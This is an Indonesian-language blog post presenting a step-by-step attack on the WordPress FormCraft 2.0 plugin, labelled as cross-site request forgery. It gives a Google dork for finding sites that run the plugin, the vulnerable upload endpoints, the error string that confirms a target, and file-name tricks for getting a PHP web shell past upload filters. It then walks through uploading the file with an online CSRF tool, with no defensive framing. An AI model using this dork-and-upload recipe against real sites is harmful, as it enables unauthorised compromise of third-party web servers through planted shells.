Recent Posts

    WordPress 5.0.4 FormCraft Plugins 2.0 - Cross Site Request Forgery

    Assalamualaikum.
    He tong !




    Pengenalan CSRF : Cross-site request forgery, dikenal juga dengan one click attack atau session riding disingkat dengan CSRF atau XSRF, merupakan bentuk eksploitasi website yang dieksekusi atas wewenang korban, tanpa dikehendakinya. CSRF menipu web site melalui request dari user yang dipercaya. Serangan bekerja melalui link atau script pada halaman site yang diakses user. Link tersebut dapat berupa gambar/image yang terhubung ke website tertentu. Jika website menyimpan informasi otentikasi dalam sebuah cookie yang belum expire, maka dengan melakukan klik ke link tersebut akan menyebabkan website diakses menggunakan cookie user yang melakukan klik. Dengan kata lain, penyerang menipu browser user untuk mengirimkan HTTP requests ke website target.



    =====================================================
    Google Dork : > inurl: /wp-content/plugins/formcraft/

    Exploit : > /wp-content/plugins/formcraft/file-upload/server/php/upload.php
                   >  /wp-content/plugins/formcraft/file-upload/server/content/upload.php 

    Vulnerability Error > "failed":"No file found 2"}

    Bypass Shell : shell.php.jpg | shell.jpg;.php | shell.php;.gif | shell.phtml | Terusno Dewe.

    =====================================================





    Dorking Dolo :v











    Masukkan Exploit

    Example : 127.0.0.1/[PATH]/wp-content/plugins/formcraft/file-upload/server/php/upload.php









    masukkan Ke CSRF Online :v
    Target yg tadi, sama Post Type diisi files[] 
    Post Type ini beda2, tergantung dari site tsb. Lalu klik Kunci !










    Lalu Pilih File yang mau Di upload, next Klik upload !












    File Uploaded !

    Cukup sekian, Pertemuan hari ini
    Stay In Here, n Good Bye !



    Wassalamualaikum..

    0 Response to "WordPress 5.0.4 FormCraft Plugins 2.0 - Cross Site Request Forgery"

    Post a Comment

    Iklan Atas Artikel

    Iklan Tengah Artikel 1

    Iklan Tengah Artikel 2

    Iklan Bawah Artikel